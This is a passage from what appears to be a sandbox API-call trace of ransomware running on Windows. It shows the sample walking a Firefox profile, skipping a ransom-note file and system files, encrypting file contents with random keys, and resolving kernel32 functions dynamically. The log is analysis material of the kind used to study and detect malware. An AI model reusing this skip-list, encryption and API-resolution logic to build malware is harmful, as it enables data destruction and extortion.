halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.js.zueq9er"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0184.552] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=3277) returned 1 [0184.552] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0184.552] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.553] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.553] CloseHandle (hObject=0x288) returned 1 [0184.553] CloseHandle (hObject=0x284) returned 1 [0184.553] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.553] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb66495d0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb66495d0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xad2771c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x50108, dwReserved0=0x0, dwReserved1=0x0, cFileName="signons.sqlite.VMMO", cAlternateFileName="SIGNON~1.VMM")) returned 1 [0184.553] lstrcmpiW (lpString1="signons.sqlite.VMMO", lpString2="DECRYPT-FILES.txt") returned 1 [0184.553] lstrcmpiW (lpString1="signons.sqlite.VMMO", lpString2="autorun.inf") returned 1 [0184.553] lstrcmpiW (lpString1="signons.sqlite.VMMO", lpString2="boot.ini") returned 1 [0184.553] lstrcmpiW (lpString1="signons.sqlite.VMMO", lpString2="desktop.ini") returned 1 [0184.553] lstrcmpiW (lpString1="signons.sqlite.VMMO", lpString2="ntuser.dat") returned 1 [0184.553] lstrcmpiW (lpString1="signons.sqlite.VMMO", lpString2="iconcache.db") returned 1 [0184.553] lstrcmpiW (lpString1="signons.sqlite.VMMO", lpString2="bootsect.bak") returned 1 [0184.553] lstrcmpiW (lpString1="signons.sqlite.VMMO", lpString2="ntuser.dat.log") returned 1 [0184.553] lstrcmpiW (lpString1="signons.sqlite.VMMO", lpString2="thumbs.db") returned -1 [0184.553] lstrcmpiW (lpString1="signons.sqlite.VMMO", lpString2="Bootfont.bin") returned 1 [0184.553] lstrlenW (lpString="signons.sqlite.VMMO") returned 19 [0184.553] lstrcmpiW (lpString1="VMMO", lpString2="lnk") returned 1 [0184.553] lstrcmpiW (lpString1="VMMO", lpString2="exe") returned 1 [0184.553] lstrcmpiW (lpString1="VMMO", lpString2="sys") returned 1 [0184.553] lstrcmpiW (lpString1="VMMO", lpString2="dll") returned 1 [0184.553] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0184.553] lstrlenW (lpString="signons.sqlite.VMMO") returned 19 [0184.553] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0184.554] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="signons.sqlite.VMMO" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite.VMMO") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite.VMMO" [0184.554] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.554] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite.VMMO" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\signons.sqlite.vmmo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0184.554] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=327944) returned 1 [0184.554] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0184.554] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x24e0000 [0184.555] UnmapViewOfFile (lpBaseAddress=0x24e0000) returned 1 [0184.555] CloseHandle (hObject=0x288) returned 1 [0184.555] CloseHandle (hObject=0x284) returned 1 [0184.555] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.555] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb26740e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb26740e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xad29d320, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x125, dwReserved0=0x0, dwReserved1=0x0, cFileName="times.json.ENUB", cAlternateFileName="TIMESJ~1.ENU")) returned 1 [0184.555] lstrcmpiW (lpString1="times.json.ENUB", lpString2="DECRYPT-FILES.txt") returned 1 [0184.555] lstrcmpiW (lpString1="times.json.ENUB", lpString2="autorun.inf") returned 1 [0184.556] lstrcmpiW (lpString1="times.json.ENUB", lpString2="boot.ini") returned 1 [0184.556] lstrcmpiW (lpString1="times.json.ENUB", lpString2="desktop.ini") returned 1 [0184.556] lstrcmpiW (lpString1="times.json.ENUB", lpString2="ntuser.dat") returned 1 [0184.556] lstrcmpiW (lpString1="times.json.ENUB", lpString2="iconcache.db") returned 1 [0184.556] lstrcmpiW (lpString1="times.json.ENUB", lpString2="bootsect.bak") returned 1 [0184.556] lstrcmpiW (lpString1="times.json.ENUB", lpString2="ntuser.dat.log") returned 1 [0184.556] lstrcmpiW (lpString1="times.json.ENUB", lpString2="thumbs.db") returned 1 [0184.556] lstrcmpiW (lpString1="times.json.ENUB", lpString2="Bootfont.bin") returned 1 [0184.556] lstrlenW (lpString="times.json.ENUB") returned 15 [0184.556] lstrcmpiW (lpString1="ENUB", lpString2="lnk") returned -1 [0184.556] lstrcmpiW (lpString1="ENUB", lpString2="exe") returned -1 [0184.556] lstrcmpiW (lpString1="ENUB", lpString2="sys") returned -1 [0184.556] lstrcmpiW (lpString1="ENUB", lpString2="dll") returned 1 [0184.556] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0184.556] lstrlenW (lpString="times.json.ENUB") returned 15 [0184.556] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0184.556] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="times.json.ENUB" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json.ENUB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json.ENUB" [0184.556] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.556] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json.ENUB" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\times.json.enub"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0184.557] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=293) returned 1 [0184.557] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0184.557] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.557] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0184.557] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0184.557] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0184.558] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fd7a0*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fd7a0*=0x100) returned 1 [0184.558] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0184.558] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.558] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.559] CloseHandle (hObject=0x288) returned 1 [0184.559] SetFilePointerEx (in: hFile=0x284, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.559] WriteFile (in: hFile=0x284, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fd7c0, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fd7c0*=0x108, lpOverlapped=0x0) returned 1 [0184.559] CloseHandle (hObject=0x0) returned 0 [0184.559] CloseHandle (hObject=0x284) returned 1 [0184.560] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.560] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.560] GetTickCount () returned 0x113562c [0184.560] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.560] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0184.560] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0184.560] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0184.561] lstrlenA (lpString="kernel32.dll") returned 12 [0184.561] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0184.561] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0184.561] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0184.561] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0184.561] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0184.561] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0184.561] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0184.561] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0184.561] lstrlenA (lpString="ADDATOMA") returned 8 [0184.561] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0184.561] lstrlenA (lpString="ADDATOMW") returned 8 [0184.561] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0184.561] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0184.561] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0184.561] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0184.561] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0184.561] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0184.561] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0184.561] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0184.561] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0184.561] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0184.561] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0184.561] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0184.561] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0184.562] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0184.562] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0184.562] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0184.562] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0184.562] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0184.562] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0184.562] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0184.562] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0184.562] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0184.562] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0184.562] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0184.562] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0184.562] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0184.562] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0184.562] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0184.562] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0184.562] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0184.562] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0184.562] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0184.562] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0184.562] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0184.562] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0184.562] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0184.562] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0184.562] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0184.562] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0184.562] lstrlenA (lpString="BACKUPREAD") returned 10 [0184.562] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0184.562] lstrlenA (lpString="BACKUPSEEK") returned 10 [0184.562] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0184.562] lstrlenA (lpString="BACKUPWRITE") returned 11 [0184.562] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0184.562] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0184.562] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0184.562] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0184.562] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0184.562] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0184.562] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0184.563] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0184.563] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0184.563] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0184.563] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0184.563] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0184.563] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0184.563] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0184.563] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0184.563] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0184.563] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0184.563] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0184.563] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0184.563] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0184.563] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0184.563] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0184.563] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0184.563] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0184.563] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0184.563] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0184.563] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0184.563] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0184.563] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0184.563] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0184.563] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0184.563] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0184.563] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0184.563] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0184.563] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0184.563] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0184.563] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0184.563] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0184.563] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0184.563] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0184.563] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0184.563] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0184.563] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0184.563] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0184.564] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0184.564] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0184.564] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0184.564] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0184.564] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0184.564] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0184.564] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0184.564] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0184.564] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0184.564] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0184.564] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0184.564] lstrlenA (lpString="BEEP") returned 4 [0184.564] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0184.564] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0184.564] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0184.564] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0184.564] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0184.564] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0184.564] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0184.564] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0184.564] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0184.564] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0184.564] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0184.564] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0184.564] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0184.564] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0184.564] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0184.564] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0184.564] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0184.564] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0184.564] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0184.564] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0184.564] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0184.564] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0184.564] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0184.564] lstrlenA (lpString="CANCELIO") returned 8 [0184.564] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0184.565] lstrlenA (lpString="CANCELIOEX") returned 10 [0184.565] lstrcpyA (in: 